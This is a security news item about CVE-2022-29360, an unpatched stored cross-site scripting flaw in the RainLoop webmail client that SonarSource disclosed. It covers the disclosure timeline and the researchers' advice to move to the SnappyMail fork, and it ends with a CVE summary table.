Security News > 2022 > April > Unpatched Bug in RainLoop Webmail Could Give Hackers Access to all Emails
An unpatched high-severity security flaw has been disclosed in the open-source RainLoop web-based email client that could be weaponized to siphon emails from victims' inboxes.
"The code vulnerability can be easily exploited by an attacker by sending a malicious email to a victim that uses RainLoop as a mail client," SonarSource security researcher Simon Scannell said in a report published this week.
Tracked as CVE-2022-29360, the flaw relates to a stored cross-site-scripting vulnerability impacting the latest version of RainLoop that was released on May 7, 2021.
Impacting all RainLoop installations running under default configurations, attack chains leveraging the flaw could take the form of a specially crafted email sent to potential victims that, when viewed, executes a malicious JavaScript payload in the browser without requiring any user interaction.
In its disclosure timeline, said that it notified the maintainers of RainLoop of the bug on November 30, 2021, and that the software maker has failed to issue a fix for more than four months.
In the absence of patches, SonarSource is recommending users to migrate to a RainLoop fork called SnappyMail, which is actively maintained and unaffected by the security issue.
News URL
https://thehackernews.com/2022/04/unpatched-bug-in-rainloop-webmail-could.html
Related Vulnerability
| DATE | CVE | VULNERABILITY TITLE | RISK |
|---|---|---|---|
| 2022-07-28 | CVE-2022-29360 | Cross-site Scripting vulnerability in Rainloop Webmail The Email Viewer in RainLoop through 1.6.0 allows XSS via a crafted email message. | 5.4 |